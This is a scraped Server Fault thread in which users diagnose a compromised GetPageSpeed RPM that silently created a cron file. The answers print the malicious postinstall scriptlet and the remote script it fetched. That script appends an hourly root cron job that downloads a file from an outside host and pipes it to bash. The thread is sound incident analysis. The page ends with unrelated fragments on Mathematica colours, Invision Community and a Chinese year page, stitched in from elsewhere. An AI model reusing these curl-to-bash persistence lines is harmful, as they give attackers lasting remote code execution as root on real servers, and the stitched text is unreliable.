How did installing this RPM create a file?Strange cron job being executed on my serverHow do I warn people that a repo has been hacked?Problem with kde-filesystem when updatingReinstall file from RPM?How do I install an rpm that complains about rpmlib(FileDigests) <= 4.6.0-1?How to stop services in spec fileIs it legal to create an RPM which only runs %post scripts to modify a file owned by another RPM?YUM Update Errorsigning yum repository doesn't help passing the gpg check upon 'yum install'additional rpms to offline centos isoYum can't add rpm repository via yum install commandHow to extract rpm preamble

Automatically convert a number to use the correct SI unit prefix

Can 'leave' mean 'forget'?

Can I ask to speak to my future colleagues before accepting an offer?

How can I reduce the sound of rain on a range hood vent?

Can the passive "être + verbe" sometimes mean the past?

Can a single server be associated with multiple domains?

How can my story take place on Earth without referring to our existing cities and countries?

Is this hogweed?

Is it bad to describe a character long after their introduction?

Should I share with a new service provider a bill from its competitor?

Most importants new papers in computational complexity

When are digital copies of Switch games made available to play?

How can a valley surrounded by mountains be fertile and rainy?

Are there any features that help with the roll to avoid the destruction of a Wand of Fireballs when using the last charge?

Golf the smallest circle!

Why did this meteor appear cyan?

Why are 120 V general receptacle circuits limited to 20 A?

Most elegant way to write a one shot IF

Can a police officer film me on their personal device in my own home?

Why do the keys in the circle of fifths have the pattern of accidentals that they do?

What's the safest way to inform a new user of their password on my web site?

Meaning of もてり and use of が

Why won't the ground take my seed?

3D nonogram, beginner's edition



How did installing this RPM create a file?


Strange cron job being executed on my serverHow do I warn people that a repo has been hacked?Problem with kde-filesystem when updatingReinstall file from RPM?How do I install an rpm that complains about rpmlib(FileDigests) <= 4.6.0-1?How to stop services in spec fileIs it legal to create an RPM which only runs %post scripts to modify a file owned by another RPM?YUM Update Errorsigning yum repository doesn't help passing the gpg check upon 'yum install'additional rpms to offline centos isoYum can't add rpm repository via yum install commandHow to extract rpm preamble






.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;








4















Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:



# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package


How did the RPM create the file and how do I see what else it did?










share|improve this question

















  • 1





    So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?

    – Aaron Copley
    6 hours ago











  • The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.

    – Pascal
    6 hours ago












  • And it's signed by them, too?

    – Aaron Copley
    6 hours ago











  • I don't know how to find that out.

    – Pascal
    6 hours ago






  • 1





    https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.

    – Pascal
    6 hours ago

















4















Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:



# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package


How did the RPM create the file and how do I see what else it did?










share|improve this question

















  • 1





    So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?

    – Aaron Copley
    6 hours ago











  • The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.

    – Pascal
    6 hours ago












  • And it's signed by them, too?

    – Aaron Copley
    6 hours ago











  • I don't know how to find that out.

    – Pascal
    6 hours ago






  • 1





    https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.

    – Pascal
    6 hours ago













4












4








4


1






Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:



# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package


How did the RPM create the file and how do I see what else it did?










share|improve this question














Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:



# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package


How did the RPM create the file and how do I see what else it did?







centos7 yum rpm






share|improve this question













share|improve this question











share|improve this question




share|improve this question










asked 8 hours ago









PascalPascal

1965 bronze badges




1965 bronze badges







  • 1





    So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?

    – Aaron Copley
    6 hours ago











  • The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.

    – Pascal
    6 hours ago












  • And it's signed by them, too?

    – Aaron Copley
    6 hours ago











  • I don't know how to find that out.

    – Pascal
    6 hours ago






  • 1





    https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.

    – Pascal
    6 hours ago












  • 1





    So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?

    – Aaron Copley
    6 hours ago











  • The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.

    – Pascal
    6 hours ago












  • And it's signed by them, too?

    – Aaron Copley
    6 hours ago











  • I don't know how to find that out.

    – Pascal
    6 hours ago






  • 1





    https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.

    – Pascal
    6 hours ago







1




1





So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?

– Aaron Copley
6 hours ago





So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?

– Aaron Copley
6 hours ago













The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.

– Pascal
6 hours ago






The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.

– Pascal
6 hours ago














And it's signed by them, too?

– Aaron Copley
6 hours ago





And it's signed by them, too?

– Aaron Copley
6 hours ago













I don't know how to find that out.

– Pascal
6 hours ago





I don't know how to find that out.

– Pascal
6 hours ago




1




1





https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.

– Pascal
6 hours ago





https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.

– Pascal
6 hours ago










2 Answers
2






active

oldest

votes


















6














# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1


https://www.getpagespeed.com/SCM/release-post-install.php contains:



#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2





share|improve this answer






























    3














    You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.



    rpm cannot completely track what happened because it is running an arbitrary script.



    gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:



    $ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
    pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
    sub 2048R/059A9010F4F3567D 2017-03-03
    $ rpm -K getpagespeed-extras-*
    getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
    getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK


    Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.



    It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.






    share|improve this answer























    • The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

      – Pascal
      4 hours ago











    • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

      – Pascal
      3 hours ago













    Your Answer








    StackExchange.ready(function()
    var channelOptions =
    tags: "".split(" "),
    id: "2"
    ;
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function()
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled)
    StackExchange.using("snippets", function()
    createEditor();
    );

    else
    createEditor();

    );

    function createEditor()
    StackExchange.prepareEditor(
    heartbeatType: 'answer',
    autoActivateHeartbeat: false,
    convertImagesToLinks: true,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: 10,
    bindNavPrevention: true,
    postfix: "",
    imageUploader:
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    ,
    onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    );



    );













    draft saved

    draft discarded


















    StackExchange.ready(
    function ()
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f972699%2fhow-did-installing-this-rpm-create-a-file%23new-answer', 'question_page');

    );

    Post as a guest















    Required, but never shown

























    2 Answers
    2






    active

    oldest

    votes








    2 Answers
    2






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes









    6














    # rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
    warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
    postinstall scriptlet (using /bin/sh):
    curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1


    https://www.getpagespeed.com/SCM/release-post-install.php contains:



    #!/bin/bash
    ### hacked by rpowned
    # bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
    echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2





    share|improve this answer



























      6














      # rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
      warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
      postinstall scriptlet (using /bin/sh):
      curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1


      https://www.getpagespeed.com/SCM/release-post-install.php contains:



      #!/bin/bash
      ### hacked by rpowned
      # bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
      echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2





      share|improve this answer

























        6












        6








        6







        # rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
        warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
        postinstall scriptlet (using /bin/sh):
        curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1


        https://www.getpagespeed.com/SCM/release-post-install.php contains:



        #!/bin/bash
        ### hacked by rpowned
        # bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
        echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2





        share|improve this answer













        # rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
        warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
        postinstall scriptlet (using /bin/sh):
        curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1


        https://www.getpagespeed.com/SCM/release-post-install.php contains:



        #!/bin/bash
        ### hacked by rpowned
        # bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
        echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2






        share|improve this answer












        share|improve this answer



        share|improve this answer










        answered 6 hours ago









        PascalPascal

        1965 bronze badges




        1965 bronze badges























            3














            You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.



            rpm cannot completely track what happened because it is running an arbitrary script.



            gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:



            $ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
            pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
            sub 2048R/059A9010F4F3567D 2017-03-03
            $ rpm -K getpagespeed-extras-*
            getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
            getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK


            Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.



            It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.






            share|improve this answer























            • The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

              – Pascal
              4 hours ago











            • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

              – Pascal
              3 hours ago















            3














            You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.



            rpm cannot completely track what happened because it is running an arbitrary script.



            gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:



            $ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
            pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
            sub 2048R/059A9010F4F3567D 2017-03-03
            $ rpm -K getpagespeed-extras-*
            getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
            getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK


            Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.



            It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.






            share|improve this answer























            • The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

              – Pascal
              4 hours ago











            • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

              – Pascal
              3 hours ago













            3












            3








            3







            You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.



            rpm cannot completely track what happened because it is running an arbitrary script.



            gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:



            $ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
            pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
            sub 2048R/059A9010F4F3567D 2017-03-03
            $ rpm -K getpagespeed-extras-*
            getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
            getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK


            Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.



            It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.






            share|improve this answer













            You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.



            rpm cannot completely track what happened because it is running an arbitrary script.



            gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:



            $ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
            pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
            sub 2048R/059A9010F4F3567D 2017-03-03
            $ rpm -K getpagespeed-extras-*
            getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
            getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK


            Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.



            It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.







            share|improve this answer












            share|improve this answer



            share|improve this answer










            answered 4 hours ago









            John MahowaldJohn Mahowald

            11k1 gold badge7 silver badges14 bronze badges




            11k1 gold badge7 silver badges14 bronze badges












            • The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

              – Pascal
              4 hours ago











            • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

              – Pascal
              3 hours ago

















            • The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

              – Pascal
              4 hours ago











            • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

              – Pascal
              3 hours ago
















            The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

            – Pascal
            4 hours ago





            The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.

            – Pascal
            4 hours ago













            Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

            – Pascal
            3 hours ago





            Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.

            – Pascal
            3 hours ago

















            draft saved

            draft discarded
















































            Thanks for contributing an answer to Server Fault!


            • Please be sure to answer the question. Provide details and share your research!

            But avoid


            • Asking for help, clarification, or responding to other answers.

            • Making statements based on opinion; back them up with references or personal experience.

            To learn more, see our tips on writing great answers.




            draft saved


            draft discarded














            StackExchange.ready(
            function ()
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f972699%2fhow-did-installing-this-rpm-create-a-file%23new-answer', 'question_page');

            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            Popular posts from this blog

            Canceling a color specificationRandomly assigning color to Graphics3D objects?Default color for Filling in Mathematica 9Coloring specific elements of sets with a prime modified order in an array plotHow to pick a color differing significantly from the colors already in a given color list?Detection of the text colorColor numbers based on their valueCan color schemes for use with ColorData include opacity specification?My dynamic color schemes

            Invision Community Contents History See also References External links Navigation menuProprietaryinvisioncommunity.comIPS Community ForumsIPS Community Forumsthis blog entry"License Changes, IP.Board 3.4, and the Future""Interview -- Matt Mecham of Ibforums""CEO Invision Power Board, Matt Mecham Is a Liar, Thief!"IPB License Explanation 1.3, 1.3.1, 2.0, and 2.1ArchivedSecurity Fixes, Updates And Enhancements For IPB 1.3.1Archived"New Demo Accounts - Invision Power Services"the original"New Default Skin"the original"Invision Power Board 3.0.0 and Applications Released"the original"Archived copy"the original"Perpetual licenses being done away with""Release Notes - Invision Power Services""Introducing: IPS Community Suite 4!"Invision Community Release Notes

            199年 目錄 大件事 到箇年出世嗰人 到箇年死嗰人 節慶、風俗習慣 導覽選單